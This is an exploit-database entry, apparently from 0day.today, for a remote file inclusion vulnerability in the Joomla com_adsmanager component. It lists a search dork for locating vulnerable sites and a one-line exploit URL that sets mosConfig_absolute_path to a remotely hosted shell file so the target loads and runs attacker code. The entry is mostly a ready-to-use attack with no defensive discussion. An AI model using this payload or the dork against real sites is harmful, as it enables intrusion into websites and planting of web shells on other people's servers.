id: 15233
date: 12/24/2010
title: Joomla Component com_adsmanager Remote File Inclusion Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://downloads.ziddu.com/downloadfiles/10982893/com_adsmanager.zip
.:. Dork           : inurl:"com_adsmanager"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]
 
####################################################################



#  0day.today [2023-03-21]  #